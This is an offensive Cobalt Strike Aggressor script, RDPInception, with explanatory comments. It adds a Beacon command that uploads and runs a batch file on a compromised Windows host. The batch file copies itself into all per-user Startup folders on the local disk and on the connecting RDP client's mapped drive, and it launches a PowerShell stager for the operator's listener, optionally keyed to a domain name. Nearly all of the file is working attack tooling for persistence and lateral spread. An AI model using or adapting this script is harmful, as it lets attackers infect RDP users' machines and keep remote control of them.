# RDPInception
#
# Written by Vincent Yiu @vysecurity
# Beacon console alias. Sleep passes the beacon id as $1 and the first
# console argument (the optional domain key) as $2; both are forwarded
# unchanged to rdpincept, which does the actual work.
alias rdpinception {
    local('$bid $domain_key');
    $bid = $1;
    $domain_key = $2;
    rdpincept($bid, $domain_key);
}
sub rdpincept {
    # Implementation behind the `rdpinception` alias.
    # $1 - beacon id the command was issued on
    # $2 - optional domain key; when set, the generated script only launches
    #      the stager if %USERDOMAIN% matches it
    # Neither variable is declared with local(), and the lambda below reads
    # them without explicit capture — presumably they behave as script-scope
    # globals here; confirm against Sleep scoping before relying on
    # concurrent invocations from several beacons.
    $beacon = $1;
    $domain = $2;
    # Force select a payload: openPayloadHelper prompts the operator for a
    # listener and calls the lambda with the chosen listener as $1.
    openPayloadHelper(lambda({
        $listener = $1;
        blog($beacon, "RDPIncepting listener: $listener");
        # Assemble a Windows batch script (CRLF line endings) in $buffer.
        # Every on-disk artefact the script creates is spelled out in these
        # literals and is a host-forensics indicator for this technique:
        # C:\temp\run.bat, \\tsclient\c\temp\run.bat, %TEMP%\temp_00.txt,
        # and copies of run.bat in per-user Startup folders on both C: and
        # the RDP client's mapped drive (\\tsclient\c). The full buffer is
        # also echoed to the beacon console below, so the team-server side
        # retains an exact record of what was written.
        $buffer = "@echo off\r\n";
        $buffer = $buffer . "timeout 1 >nul 2>&1\r\n";
        # Stage run.bat in C:\temp locally and in \\tsclient\c\temp on the
        # RDP client's redirected drive (errors are silenced with >nul 2>&1).
        $buffer = $buffer . "mkdir \\\\tsclient\\c\\temp >nul 2>&1\r\n";
        $buffer = $buffer . "mkdir C:\\temp >nul 2>&1\r\n";
        $buffer = $buffer . "copy run.bat C:\\temp >nul 2>&1\r\n";
        $buffer = $buffer . "copy run.bat \\\\tsclient\\c\\temp >nul 2>&1\r\n";
        $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n";
        # %dirs% / %dirs2% hold `dir` commands that list every directory named
        # *Startup* under C:\users and under \\tsclient\c\users; the two echo
        # lines run them and keep only paths containing the per-user
        # "Start Menu\Programs\Startup" folder, appended to %TEMP%\temp_00.txt.
        $buffer = $buffer . "set dirs=dir /a:d /b /s C:\\users\\*Startup*\r\n";
        $buffer = $buffer . "set dirs2=dir /a:d /b /s \\\\tsclient\\c\\users\\*startup*\r\n";
        $buffer = $buffer . "echo|%dirs%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n";
        $buffer = $buffer . "echo|%dirs2%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n";
        # For each Startup folder found, copy run.bat into it from whichever of
        # the three staging locations is reachable (the others fail silently).
        $buffer = $buffer . "for /F \"tokens=*\" %%a in (%TEMP%\\temp_00.txt) DO (\r\n";
        $buffer = $buffer . " copy run.bat \"%%a\" >nul 2>&1\r\n";
        $buffer = $buffer . " copy C:\\temp\\run.bat \"%%a\" >nul 2>&1\r\n";
        $buffer = $buffer . " copy \\\\tsclient\\c\\temp\\run.bat \"%%a\" >nul 2>&1\r\n";
        $buffer = $buffer . ")\r\n";
        $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n";
        # Keying by Domain: powershell($listener, false) is the Aggressor
        # built-in that returns a PowerShell one-liner for the listener. With a
        # domain key it is wrapped in a batch `If` so it only runs when
        # %USERDOMAIN% equals the key; otherwise it is appended unconditionally.
        if ($domain){
            $buffer = $buffer . "If \"" . $domain . "\"==\"%USERDOMAIN%\" (";
            $buffer = $buffer . powershell($listener, false) . ")";
        }
        else{
            $buffer = $buffer . powershell($listener, false);
        }
        # Log the complete generated script, then create C:\temp on the
        # beacon host, upload the buffer as C:\temp\run.bat and run it via
        # the beacon's shell command.
        blog($beacon, $buffer);
        blog($beacon, "Infecting machine with RDPInception.");
        bmkdir($beacon, "C:\\temp");
        bupload_raw($beacon, "C:\\temp\\run.bat", $buffer);
        blog($beacon, "Executing RDPInception from C:\\temp\\run.bat");
        bshell($beacon, "C:\\temp\\run.bat");
    # $bids is passed into the lambda's scope (here $1 is the sub's beacon id)
    # but is never referenced inside the lambda, so this capture looks
    # vestigial; the body relies on $beacon and $domain from the sub instead.
    }, $bids => $1));
}
# Register `rdpinception` as a Beacon console command. The second argument is
# the one-line summary shown in the command list, the third the long help text
# shown by `help rdpinception`; the help text is kept as a single literal.
beacon_command_register(
    "rdpinception",
    "Infects the machine with RDPInception",
    "Synopsis: rdpinception [DOMAIN Key]\n\nInfects the machine with RDPInception, a HTTP, HTTPS or DNS payload that can egress is recommended."
);